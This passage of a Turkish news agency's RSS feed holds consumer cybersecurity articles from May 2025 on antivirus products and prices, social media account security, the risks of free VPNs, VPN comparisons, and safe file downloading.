<p data-start="765" data-end="1081" class=""><strong data-start="765" data-end="795">Bitdefender Total Security</strong><br data-start="795" data-end="798">Çok katmanlı fidye yazılımı koruması sunan Bitdefender, web kamerası ve mikrofon koruması gibi özellikleriyle öne çıkıyor. Ayrıca içerisinde VPN, ebeveyn denetimi ve şifre yöneticisi de bulunuyor. Yıllık fiyatı cihaz sayısına göre değişmekle birlikte 300-400 TL arasında değişiyor.</p>
<p data-start="1083" data-end="1353" class=""><strong data-start="1083" data-end="1111">Kaspersky Plus / Premium</strong><br data-start="1111" data-end="1114">Tehdit algılama başarısıyla öne çıkan Kaspersky, gerçek zamanlı koruma ve güvenli ödeme gibi işlevlerle tercih ediliyor. Ek olarak VPN ve şifre yöneticisi gibi güvenlik araçlarını da sunuyor. Yıllık maliyeti ortalama 300-500 TL arasında.</p>
<p data-start="1355" data-end="1613" class=""><strong data-start="1355" data-end="1376">Norton 360 Deluxe</strong><br data-start="1376" data-end="1379">Kapsamlı tehdit koruması ve güçlü kimlik güvenliği sunan Norton 360 Deluxe, aynı zamanda bulut yedekleme ve dark web izleme gibi işlevleri de içeriyor. VPN ve ebeveyn kontrolü de paket kapsamında. Yıllık ücreti 500-700 TL civarında.</p>
<p data-start="1615" data-end="1877" class=""><strong data-start="1615" data-end="1641">ESET Internet Security</strong><br data-start="1641" data-end="1644">Düşük sistem kaynağı kullanımıyla dikkat çeken ESET, güvenilir tehdit engelleme sistemi ve gelişmiş ağ koruması sunuyor. Ekstra olarak anti-phishing ve ev ağı tarama özelliklerine de sahip. Yıllık lisans fiyatı yaklaşık 300-350 TL.</p>
<p data-start="1879" data-end="2120" class=""><strong data-start="1879" data-end="1906">McAfee Total Protection</strong><br data-start="1906" data-end="1909">Tüm cihaz türlerinde çalışabilen McAfee, kullanıcı dostu arayüzüyle tercih ediliyor. VPN, şifre yöneticisi ve kimlik koruması gibi güvenlik araçlarını da barındırıyor. Yıllık fiyat aralığı 400-600 TL arasında.</p>
<p data-start="2122" data-end="2389" class=""><strong data-start="2122" data-end="2152">Hangi antivirüs kime göre?</strong><br data-start="2152" data-end="2155">Günlük kullanım için daha hafif ve kullanıcı dostu çözümler sunan Bitdefender Total Security ile ESET Internet Security öne çıkarken, kurumsal kullanıcılar için Kaspersky Premium ve Norton 360 Deluxe daha kapsamlı çözümler sağlıyor.</p>
<p data-start="2391" data-end="2604" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Hem Bedeninizi Hem Bilgisayarınızı Koruyun: Virüslerden Etkili Korunma Yöntemleri</title>
            <link>https://cumha.com.tr/hem-bedeninizi-hem-bilgisayarinizi-koruyun-viruslerden-etkili-korunma-yoentemleri</link>
            <guid>https://cumha.com.tr/hem-bedeninizi-hem-bilgisayarinizi-koruyun-viruslerden-etkili-korunma-yoentemleri</guid>
            <description><![CDATA[ Sağlık açısından biyolojik virüsler, dijital dünyada ise bilgisayar virüsleri ciddi tehditler oluşturmaya devam ediyor. Günlük hayatta uygulanabilecek basit ama etkili önlemlerle bu tehditlere karşı korunmak mümkün. İşte hem sağlığınızı hem dijital güvenliğinizi korumanın yolları… ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_6814747c42a05.webp" length="68160" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 10:30:19 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Virüslerden korunmak için hangi hijyen kuralları uygulanmalı, dijital ortamda hangi davranışlar tehlikelidir, biyolojik virüslere karşı aşıların rolü nedir, bilgisayar güvenliğini artırmak için ne yapılmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="407" data-end="716" class=""><strong data-start="407" data-end="462">Biyolojik virüslere karşı alınması gereken önlemler</strong><br data-start="462" data-end="465">Son yıllarda özellikle COVID-19 pandemisiyle birlikte biyolojik virüslerin hayat üzerindeki etkisi daha görünür hale geldi. Uzmanlar, solunum yoluyla bulaşan grip ve benzeri virüslerden korunmak için temel hijyen kurallarının önemine dikkat çekiyor.</p>
<p data-start="718" data-end="935" class="">En etkili yöntemlerden biri, ellerin sabun ve suyla en az 20 saniye boyunca sık sık yıkanması. Ayrıca, kalabalık ve kapalı alanlarda maske kullanımı da solunum yoluyla bulaşan virüslere karşı koruyucu etki sağlıyor.</p>
<p data-start="937" data-end="1139" class="">Biyolojik virüslerden korunmak için bir diğer önemli yöntem ise aşılar. Mevsimsel grip ve COVID-19’a karşı geliştirilen aşılar, bağışıklık sistemini güçlendirerek hastalığın ağır seyretmesini önlüyor.</p>
<p data-start="1141" data-end="1483" class="">Beslenme düzeni, uyku kalitesi ve stres düzeyi de bağışıklık sisteminin güçlü kalmasında belirleyici rol oynuyor. Özellikle hasta bireylerle yakın temastan kaçınılması, enfeksiyon riskini ciddi şekilde azaltıyor. Kapalı ortamların sık sık havalandırılması ve yüz bölgesine dokunmaktan kaçınılması da virüslerin bulaşma ihtimalini düşürüyor.</p>
<p data-start="1485" data-end="1751" class=""><strong data-start="1485" data-end="1538">Dijital virüslere karşı alınması gereken önlemler</strong><br data-start="1538" data-end="1541">Biyolojik tehditlerin yanı sıra dijital dünyada da bilgisayar virüsleri kullanıcıların verilerini ve gizliliğini tehdit ediyor. Bu virüslerden korunmanın ilk adımı, güvenilir bir antivirüs yazılımı kullanmak.</p>
<p data-start="1753" data-end="1996" class="">E-posta ya da mesaj yoluyla gelen bilinmeyen bağlantılara tıklamamak da siber güvenlik açısından kritik önemde. Ayrıca, kullanılan tüm yazılımların güncel tutulması, sistem açıklarının siber saldırganlar tarafından kullanılmasını engelliyor.</p>
<p data-start="1998" data-end="2179" class="">Güçlü ve karmaşık şifrelerin tercih edilmesi, aynı şifrenin birden fazla platformda kullanılmaması ve iki faktörlü kimlik doğrulamanın aktif edilmesi, dijital güvenliği artırıyor.</p>
<p data-start="2181" data-end="2575" class="">Lisanssız yazılımların yüklenmesi, özellikle crack dosyalarının kullanımı büyük risk oluşturuyor. Bu tür programlar, çoğu zaman virüs ve zararlı yazılımlar içeriyor. Verilerin düzenli yedeklenmesi ise özellikle fidye yazılımlarına karşı kritik bir savunma yöntemi olarak öne çıkıyor. Son olarak, ortak Wi-Fi ağları üzerinden banka işlemleri gibi hassas verilerle işlem yapılmaması öneriliyor.</p>
<p data-start="2577" data-end="2796" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Instagram ve Sosyal Medya Hesaplarınızı Korumak İçin Uymanız Gereken 8 Altın Güvenlik Kuralı</title>
            <link>https://cumha.com.tr/instagram-ve-sosyal-medya-hesaplarinizi-korumak-icin-uymaniz-gereken-8-altin-guvenlik-kurali</link>
            <guid>https://cumha.com.tr/instagram-ve-sosyal-medya-hesaplarinizi-korumak-icin-uymaniz-gereken-8-altin-guvenlik-kurali</guid>
            <description><![CDATA[ Instagram başta olmak üzere sosyal medya hesaplarınızın kötü niyetli kişilerin eline geçmesini engellemek için şifre güvenliğinden iki faktörlü kimlik doğrulamaya kadar almanız gereken temel önlemleri derledik. İşte dijital güvenliğinizi artıracak 8 önemli tavsiye. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_6814745c45191.webp" length="72698" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 10:29:43 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Sosyal medya şifresi nasıl olmalı, 2FA nedir ve nasıl açılır, Instagram giriş etkinliği nasıl kontrol edilir, sahte işbirliği teklifleri nasıl anlaşılır</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="402" data-end="732" class=""><strong data-start="402" data-end="442">1. Güçlü ve Benzersiz Şifre Kullanın</strong><br data-start="442" data-end="445">Sosyal medya hesaplarının güvenliği için ilk adım, karmaşık ve benzersiz bir şifre oluşturmaktır. Şifreniz en az 12 karakterden oluşmalı; büyük harf, küçük harf, rakam ve özel karakter içermelidir. Ayrıca her platform için farklı bir şifre kullanmak olası toplu saldırıların önüne geçer.</p>
<p data-start="734" data-end="1062" class=""><strong data-start="734" data-end="790">2. İki Faktörlü Kimlik Doğrulama (2FA) Etkinleştirin</strong><br data-start="790" data-end="793">Google Authenticator, Microsoft Authenticator veya SMS ile çalışan iki faktörlü kimlik doğrulama yöntemleri, hesabınıza giriş yapılsa bile ikinci bir doğrulama adımı olmadan erişimi engeller. Bu yöntem sosyal medya hesaplarına yetkisiz erişimi büyük ölçüde zorlaştırır.</p>
<p data-start="1064" data-end="1370" class=""><strong data-start="1064" data-end="1104">3. Şüpheli Bağlantılardan Uzak Durun</strong><br data-start="1104" data-end="1107">Özellikle DM yoluyla gelen bilinmeyen bağlantılara tıklamaktan kaçının. 'Hesabınız kapatılacak' gibi panik yaratmayı amaçlayan mesajlar, genellikle oltalama saldırılarıdır. Bu tür bağlantılar, kullanıcı adı ve şifrelerinizi ele geçirmek için hazırlanmış olabilir.</p>
<p data-start="1372" data-end="1654" class=""><strong data-start="1372" data-end="1413">4. Gizlilik Ayarlarını Gözden Geçirin</strong><br data-start="1413" data-end="1416">Kimlerin içeriklerinizi görebileceğini sınırlayarak kişisel bilgilerinizi koruyabilirsiniz. Tanımadığınız kişilerin size mesaj atmasını veya içeriklerinizde sizi etiketlemesini kısıtlamak, güvenliği artıran basit ama etkili adımlardandır.</p>
<p data-start="1656" data-end="1951" class=""><strong data-start="1656" data-end="1706">5. Hesap Erişim Kayıtlarını Düzenli Takip Edin</strong><br data-start="1706" data-end="1709">Instagram gibi platformlarda giriş yapılan cihazları kontrol etmek mümkündür. Ayarlar menüsündeki 'Giriş Etkinliği' bölümünden oturum açılan cihazları inceleyin. Şüpheli bir giriş fark ederseniz derhal oturumu kapatın ve şifrenizi değiştirin.</p>
<p data-start="1953" data-end="2281" class=""><strong data-start="1953" data-end="1988">6. E-posta Güvenliğini Sağlayın</strong><br data-start="1988" data-end="1991">Sosyal medya hesaplarınıza bağlı olan e-posta adresinizin güvenliği de büyük önem taşır. E-posta şifreniz sosyal medya şifrenizden farklı olmalı ve mümkünse 2FA özelliği aktif hale getirilmelidir. E-posta hesabınızın ele geçirilmesi, sosyal medya hesaplarınıza da erişim anlamına gelebilir.</p>
<p data-start="2283" data-end="2588" class=""><strong data-start="2283" data-end="2338">7. Üçüncü Taraf Uygulama Erişimlerini Sınırlandırın</strong><br data-start="2338" data-end="2341">Hesabınıza bağlı uygulamaları düzenli olarak gözden geçirin. Tanımadığınız ya da güvenmediğiniz uygulamaların erişimini kaldırmak, veri sızıntılarının önüne geçebilir. Özellikle ücretsiz analiz ve takipçi uygulamaları güvenlik riski oluşturabilir.</p>
<p data-start="2590" data-end="2893" class=""><strong data-start="2590" data-end="2656">8. Tanıtım ve Reklam İşbirliği Tuzaklarına Karşı Dikkatli Olun</strong><br data-start="2656" data-end="2659">Influencer veya içerik üreticisiyseniz, sahte markalardan gelen işbirliği tekliflerine karşı temkinli olun. Gerçek markalar genellikle resmi kurumsal e-postaları kullanır. Direkt mesajla gelen linkli teklifler dikkatle incelenmelidir.</p>
<p data-start="2895" data-end="3060" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Sosyal Medyada Güvende Kalmak İçin Altı Kritik Adım: Uzmanlar Uyarıyor</title>
            <link>https://cumha.com.tr/sosyal-medyada-guvende-kalmak-icin-alti-kritik-adim-uzmanlar-uyariyor</link>
            <guid>https://cumha.com.tr/sosyal-medyada-guvende-kalmak-icin-alti-kritik-adim-uzmanlar-uyariyor</guid>
            <description><![CDATA[ Sosyal medya kullanıcılarının gizliliğini koruması ve siber tehditlere karşı önlem alması için dikkat etmesi gereken altı temel kural açıklandı. Güçlü şifrelerden konum paylaşımına kadar birçok konuda önemli uyarılar yapıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_68147432db6df.webp" length="75526" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 10:29:05 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Sosyal medya gizlilik ayarları nasıl yapılmalı, güçlü şifre oluşturmanın püf noktaları neler, hangi kişisel bilgiler paylaşılmamalı, kimlik avı saldırılarından nasıl korunulur</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="340" data-end="850" class=""><strong data-start="340" data-end="388">Gizlilik ayarları mutlaka gözden geçirilmeli</strong><br data-start="388" data-end="391">Sosyal medya platformlarında yapılan paylaşımların kimler tarafından görülebileceği büyük önem taşıyor. Uzmanlar, kullanıcıların gizlilik ayarlarını herkese açık yerine sadece arkadaşlarla sınırlandırmalarını tavsiye ediyor. Ayrıca profil bilgileri arasında yer alan telefon numarası, doğum tarihi ve e-posta gibi kişisel verilerin gizlenmesi gerektiği vurgulanıyor. Arama motorlarının profil bilgilerine erişmesini engellemek de öneriler arasında yer alıyor.</p>
<p data-start="852" data-end="1249" class=""><strong data-start="852" data-end="900">Kişisel bilgileri paylaşmak risk doğurabilir</strong><br data-start="900" data-end="903">Kimlik numarası, ev adresi, okul ve işyeri bilgileri gibi hassas detayların sosyal medya ortamında paylaşılması, dolandırıcılık ve kimlik hırsızlığı gibi riskleri beraberinde getiriyor. Doğum tarihi ve evcil hayvan adı gibi bilgiler, şifre kurtarma sistemlerinde sıkça kullanıldığından bu tür paylaşımlardan da kaçınılması gerektiği belirtiliyor.</p>
<p data-start="1251" data-end="1539" class=""><strong data-start="1251" data-end="1284">Güçlü ve benzersiz şifre şart</strong><br data-start="1284" data-end="1287">Her sosyal medya platformunda farklı ve karmaşık şifreler kullanılması gerektiğinin altı çiziliyor. Şifrelerin düzenli aralıklarla değiştirilmesi ve iki adımlı doğrulama (2FA) özelliğinin aktif hale getirilmesi, hesap güvenliği için büyük önem taşıyor.</p>
<p data-start="1541" data-end="1824" class=""><strong data-start="1541" data-end="1576">Şüpheli bağlantılara tıklamayın</strong><br data-start="1576" data-end="1579">Tanımadığınız kişilerden gelen mesajlar ve bağlantılar, genellikle kimlik avı (phishing) saldırılarının aracı olabiliyor. Uzmanlar, bu tür mesajlara itibar edilmemesi gerektiğini ve kullanıcıların her zaman tetikte olması gerektiğini belirtiyor.</p>
<p data-start="1826" data-end="2086" class=""><strong data-start="1826" data-end="1865">Cihaz güvenliği göz ardı edilmemeli</strong><br data-start="1865" data-end="1868">Akıllı telefonlar ve bilgisayarlar, düzenli olarak güncellenen güvenilir antivirüs yazılımlarıyla korunmalı. Sosyal medya uygulamaları ise yalnızca Google Play Store ya da App Store gibi resmi mağazalardan indirilmeli.</p>
<p data-start="2088" data-end="2424" class=""><strong data-start="2088" data-end="2130">Paylaşımlarda gizli bilgileri gizleyin</strong><br data-start="2130" data-end="2133">Fotoğraf ve videolarda arka planda görülebilecek adres, araç plakası ya da resmi belgeler gibi kişisel detaylar gözden geçirilmeli. Ayrıca konum bilgisi paylaşımının canlı olarak değil, geçmiş zamanda yapılması öneriliyor. Bu, fiziksel güvenlik açısından önemli bir önlem olarak öne çıkıyor.</p>
<p data-start="2426" data-end="2614" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Bedava VPN'ler Gerçekten Güvenli mi? İşte Güvenli VPN'lerin Sahip Olması Gereken 5 Özellik</title>
            <link>https://cumha.com.tr/bedava-vpnler-gercekten-guvenli-mi-iste-guvenli-vpnlerin-sahip-olmasi-gereken-5-ozellik</link>
            <guid>https://cumha.com.tr/bedava-vpnler-gercekten-guvenli-mi-iste-guvenli-vpnlerin-sahip-olmasi-gereken-5-ozellik</guid>
            <description><![CDATA[ Kullanıcı verilerini toplayıp satabilen ücretsiz VPN servisleri büyük güvenlik riskleri taşıyor. Şifreleme protokolleri, DNS sızıntı koruması ve bağımsız denetim gibi kriterler, VPN seçerken dikkat edilmesi gereken unsurlar arasında yer alıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_6814740e92bb8.webp" length="31838" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 10:28:26 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Güvenli bir VPN nasıl anlaşılır, ücretsiz VPN kullanmak neden risklidir, kill switch özelliği ne işe yarar, VPN yüzde 100 gizlilik sağlar mı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="361" data-end="667" class=""><strong data-start="378" data-end="424">Güvenli VPN’lerin ortak özellikleri neler?</strong><br data-start="424" data-end="427">İnternette gizliliğini korumak isteyen kullanıcılar için sanal özel ağ (VPN) servisleri önemli bir araç haline geldi. Ancak her VPN hizmeti aynı düzeyde güvenlik sağlamıyor. Güvenli kabul edilen VPN'lerin bazı ortak özellikleri bulunuyor.</p>
<p data-start="669" data-end="941" class="">Bu özelliklerin başında, hizmetin herhangi bir kullanıcı verisini kaydetmediğini beyan ettiği 'kayıt tutmama politikası' (no-log policy) geliyor. Ayrıca OpenVPN ya da WireGuard gibi güçlü şifreleme protokolleriyle veri iletimini koruyan VPN'ler daha güvenilir sayılıyor.</p>
<p data-start="943" data-end="1269" class="">DNS sızıntı koruması ve internet bağlantısı kesildiğinde kullanıcıyı çevrim dışı bırakan 'kill switch' gibi ek güvenlik önlemleri de dikkat çeken kriterler arasında. Hizmetin merkezi konumu da önem taşıyor; İsviçre ve Panama gibi kullanıcı gizliliğine önem veren ülkelerde konumlanan VPN şirketleri daha avantajlı görülüyor.</p>
<p data-start="1271" data-end="1389" class="">Son olarak, bağımsız kuruluşlar tarafından denetlenmiş VPN servisleri, kullanıcı güveni açısından artı puan kazanıyor.</p>
<p data-start="1391" data-end="1681" class=""><strong data-start="1391" data-end="1440">Güvensiz VPN’ler hangi riskleri barındırıyor?</strong><br data-start="1440" data-end="1443">Özellikle ücretsiz VPN servisleri, çoğu zaman güvenlikten çok uzak çözümler sunuyor. Bu tür hizmetler kullanıcı verilerini toplayıp üçüncü taraflara satabilirken, yeterli şifreleme sağlamadıkları için veri sızıntılarına da açık kalıyor.</p>
<p data-start="1683" data-end="1911" class="">Bazı ücretsiz ya da sahte VPN uygulamaları, zararlı yazılımlar barındırarak cihaz güvenliğini tehlikeye atabiliyor. IP sızıntısı gibi teknik zaafiyetler ise kullanıcıların gerçek konumlarının ortaya çıkmasına neden olabiliyor.</p>
<p data-start="1913" data-end="2147" class=""><strong data-start="1913" data-end="1947">Yüzde 100 anonimlik mümkün mü?</strong><br data-start="1947" data-end="1950">Uzmanlara göre, hiçbir VPN servisi yüzde 100 anonimlik garantisi veremez. Kullanıcının cihaz güvenliği, kullandığı diğer yazılımlar ve çevrim içi davranışları da bu süreçte belirleyici rol oynar.</p>
<p data-start="2149" data-end="2334" class="">Bu nedenle kullanıcıların, ücretsiz ve bilinmeyen servisler yerine ExpressVPN, NordVPN ya da ProtonVPN gibi ücretli ve bağımsız denetimlerden geçmiş hizmetleri tercih etmesi öneriliyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>En Güvenli, Hızlı ve Uygun Fiyatlı VPN Seçenekleri: Hangi VPN Neye Göre Tercih Edilmeli?</title>
            <link>https://cumha.com.tr/en-guvenli-hizli-ve-uygun-fiyatli-vpn-secenekleri-hangi-vpn-neye-goere-tercih-edilmeli</link>
            <guid>https://cumha.com.tr/en-guvenli-hizli-ve-uygun-fiyatli-vpn-secenekleri-hangi-vpn-neye-goere-tercih-edilmeli</guid>
            <description><![CDATA[ İnternette gizlilik, hız, yayın izleme ve fiyat performansı arayan kullanıcılar için VPN karşılaştırması yapıldı. En güvenli, en hızlı, en ucuz ve yayın izleme için en ideal VPN&#039;ler listelendi. VPN seçerken nelere dikkat edilmesi gerektiği de açıklandı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681473ed4af35.webp" length="41468" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 10:27:48 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>En güvenli VPN hangisi, Netflix için en iyi VPN nedir, hangi VPN en ucuz, VPN seçerken nelere dikkat edilmeli</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="386" data-end="1071" class=""><strong data-start="386" data-end="424">Genel kullanım için en iyi VPN'ler</strong><br data-start="424" data-end="427">İnternette güvenli gezinmek, yayın izlemek veya torrent kullanmak isteyen kullanıcılar için ExpressVPN, NordVPN ve Surfshark gibi VPN hizmetleri öne çıkıyor. ExpressVPN, 94 ülkede sunucu desteği, yüksek hız ve güvenlik ile dikkat çekerken, Netflix ve torrent uyumluluğu sunuyor. Ancak fiyatı diğer seçeneklere göre daha yüksek.<br data-start="754" data-end="757">NordVPN, çift katmanlı şifreleme ve reklam engelleme gibi ek güvenlik özellikleri ile öne çıkarken, masaüstü arayüzünün zaman zaman karmaşık olabileceği belirtiliyor. Surfshark ise sınırsız cihazda kullanım imkânı ve uygun fiyat avantajı ile öne çıkıyor; bazı uzak sunucularda zaman zaman hız düşüşü yaşanabiliyor.</p>
<p data-start="1073" data-end="1468" class=""><strong data-start="1073" data-end="1109">Yalnızca gizlilik odaklı VPN'ler</strong><br data-start="1109" data-end="1112">Yalnızca çevrimiçi gizlilik arayan kullanıcılar için ProtonVPN ve Mullvad VPN öne çıkıyor. İsviçre merkezli ProtonVPN, açık kaynak yapısı ve log tutmayan politikası ile yüksek düzeyde gizlilik sağlıyor. Mullvad VPN ise kullanıcıdan hiçbir kişisel bilgi istememesi ve sabit fiyat politikası ile anonim kalmak isteyen kullanıcılar tarafından tercih ediliyor.</p>
<p data-start="1470" data-end="1805" class=""><strong data-start="1470" data-end="1523">Netflix ve yayın platformları için en iyi VPN'ler</strong><br data-start="1523" data-end="1526">ExpressVPN, NordVPN ve Surfshark, dünya genelinde farklı yayın platformlarına erişim sağlamak isteyen kullanıcılar için en iyi seçenekler arasında yer alıyor. Bu VPN'ler, bölgesel kısıtlamaları aşarak Netflix, Hulu, Disney+ gibi platformlara erişimde yüksek başarı oranına sahip.</p>
<p data-start="1807" data-end="2099" class=""><strong data-start="1807" data-end="1843">En uygun fiyatlı VPN seçenekleri</strong><br data-start="1843" data-end="1846">Uzun vadeli planlarda uygun fiyat arayan kullanıcılar için Surfshark, Private Internet Access (PIA) ve AtlasVPN öne çıkan hizmetler arasında. Özellikle Surfshark’ın 2 yıllık planı, çoklu cihaz desteği ile birlikte fiyat/performans açısından öne çıkıyor.</p>
<p data-start="2101" data-end="2439" class=""><strong data-start="2101" data-end="2144">VPN seçerken dikkat edilmesi gerekenler</strong><br data-start="2144" data-end="2147">VPN tercihinde bulunurken öncelikle kayıt politikası incelenmeli, ‘no-logs’ (kayıt tutmama) ilkesine uyulması tercih edilmeli. Bunun yanında bağlantı hızı, ülke ve sunucu çeşitliliği, cihaz sayısı sınırı, torrent desteği ve 7/24 müşteri hizmetleri gibi kriterler de göz önünde bulundurulmalı.</p>
<p data-start="2441" data-end="2563" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İnternetten Dosya İndirirken Bu Hatalar Virüs Bulaştırıyor! İşte Güvenliğinizi Sağlamanın Yolları</title>
            <link>https://cumha.com.tr/internetten-dosya-indirirken-bu-hatalar-virus-bulastiriyor-iste-guvenliginizi-saglamanin-yollari</link>
            <guid>https://cumha.com.tr/internetten-dosya-indirirken-bu-hatalar-virus-bulastiriyor-iste-guvenliginizi-saglamanin-yollari</guid>
            <description><![CDATA[ İnternetten dosya indirirken farkında olmadan cihazınıza zararlı yazılım bulaştırabilirsiniz. Crack dosyaları, sahte güncellemeler ve bilinmeyen uzantılar en büyük risk kaynakları arasında. İşte güvenli bir indirme deneyimi için dikkat etmeniz gereken hayati detaylar. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681473c98090d.webp" length="27030" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 10:27:10 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Hangi dosya uzantıları risklidir, güvenli dosya nereden indirilir, crack dosyaları neden tehlikelidir, indirme sonrası dosya nasıl kontrol edilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="410" data-end="793" class=""><strong data-start="410" data-end="448">Yalnızca Resmî Kaynakları Kullanın</strong><br data-start="448" data-end="451">Yazılım ve uygulama indirmek isteyen kullanıcıların ilk kuralı, dosyaları yalnızca üreticinin resmi web sitesi ya da güvenilir dijital platformlardan indirmektir. Google Play, App Store ve Steam gibi tanınmış mağazalar bu anlamda güvenli seçenekler sunar. Crack, mod, warez gibi korsan içerikler ise yüksek oranda zararlı yazılım riski taşır.</p>
<p data-start="795" data-end="1077" class=""><strong data-start="795" data-end="829">Dosya Uzantılarına Dikkat Edin</strong><br data-start="829" data-end="832">İndirilen dosyanın uzantısı da güvenlik açısından büyük önem taşır. Özellikle .exe, .scr, .bat, .js gibi çalıştırılabilir dosya uzantıları, virüs veya truva atı barındırabilir. Beklenmedik veya dosya adıyla uyuşmayan uzantılardan kaçınılmalıdır.</p>
<p data-start="1079" data-end="1309" class=""><strong data-start="1079" data-end="1110">Antivirüs Yazılımı Kullanın</strong><br data-start="1110" data-end="1113">Güncel antivirüs programları, indirilen dosyaları otomatik olarak tarayarak kullanıcıları büyük ölçüde korur. Bu yazılımlar, şüpheli dosyaları tespit ederek açılmadan önce önlem alınmasını sağlar.</p>
<p data-start="1311" data-end="1592" class=""><strong data-start="1311" data-end="1355">Kullanıcı Yorumlarını ve Puanları Okuyun</strong><br data-start="1355" data-end="1358">Uygulama ya da yazılım indirirken, platform üzerindeki kullanıcı yorumları ve verilen puanlar, içeriğin güvenliği hakkında önemli ipuçları sunar. Düşük puanlar ya da çok sayıda olumsuz yorum, dosyanın riskli olabileceğine işaret eder.</p>
<p data-start="1594" data-end="1791" class=""><strong data-start="1594" data-end="1635">Tarayıcı Uyarılarını Göz Ardı Etmeyin</strong><br data-start="1635" data-end="1638">Tarayıcıların verdiği güvenlik uyarıları dikkate alınmalıdır. Özellikle “Bu site güvenli değil” uyarısı görülen sitelerden hiçbir dosya indirilmemelidir.</p>
<p data-start="1793" data-end="2081" class=""><strong data-start="1793" data-end="1836">İndirdikten Hemen Sonra Dosyayı Açmayın</strong><br data-start="1836" data-end="1839">Bir dosya indirildikten sonra hemen çalıştırılmamalıdır. Öncelikle antivirüs yazılımı ile taranmalı, şüphe durumunda VirusTotal.com gibi analiz sitelerinde kontrol edilmelidir. Bu adımlar, zararlı yazılımların cihaza sızmasını engelleyebilir.</p>
<p data-start="2083" data-end="2339" class=""><strong data-start="2083" data-end="2115">Riskli Durumlara Dikkat Edin</strong><br data-start="2115" data-end="2118">Torrent siteleri, sahte yazılım güncellemeleri ve e-posta ya da mesajlaşma uygulamalarından gelen bilinmeyen dosyalar ciddi tehlike oluşturur. Bu kaynaklardan gelen içerikler çoğunlukla kötü amaçlı yazılım barındırabilir.</p>
<p data-start="2341" data-end="2499" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>VPN kullanarak internette hem gizliliğinizi koruyun hem de sansürlü içeriklere erişin</title>
            <link>https://cumha.com.tr/vpn-kullanarak-internette-hem-gizliliginizi-koruyun-hem-de-sansurlu-iceriklere-erisin</link>
            <guid>https://cumha.com.tr/vpn-kullanarak-internette-hem-gizliliginizi-koruyun-hem-de-sansurlu-iceriklere-erisin</guid>
            <description><![CDATA[ VPN (Sanal Özel Ağ) teknolojileri, internet kullanıcılarına IP adreslerini gizleyerek anonimlik sağlarken aynı zamanda şifreli bağlantılar ile veri güvenliğini artırıyor. Netflix gibi coğrafi kısıtlamalı platformlara erişimden, kamusal Wi-Fi ağlarında korunmaya kadar birçok avantaj sunan VPN servisleri, sansürü aşmak isteyenlerin de ilk tercihi oluyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_68147246465e2.webp" length="49550" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 10:26:46 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>VPN nedir ne işe yarar, VPN kullanarak Netflix izlenebilir mi, VPN ile sansür nasıl aşılır, internet servis sağlayıcısı VPN ile kullanıcıyı izleyebilir mi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="606" data-end="902" class=""><strong data-start="606" data-end="637">VPN nedir ve nasıl çalışır?</strong><br data-start="637" data-end="640">Sanal Özel Ağ (VPN – Virtual Private Network), internet trafiğini şifreleyerek kullanıcı ile ziyaret edilen web sitesi arasında güvenli bir tünel oluşturur. Bu sayede kullanıcıların IP adresi maskelenir, çevrimiçi etkinlikler gizlenir ve veri güvenliği sağlanır.</p>
<p data-start="904" data-end="1233" class=""><strong data-start="904" data-end="943">VPN ile sağlanan başlıca avantajlar</strong><br data-start="943" data-end="946">VPN kullanımıyla IP adresi gizlenerek internette anonim gezinti sağlanabilir. Bu özellik, özellikle kullanıcıların konum ve kimlik bilgilerinin ifşa olmadan dolaşımını mümkün kılar. Kamusal Wi-Fi ağlarında ise VPN, tüm veri trafiğini şifreleyerek kötü amaçlı kişilerden korunmayı sağlar.</p>
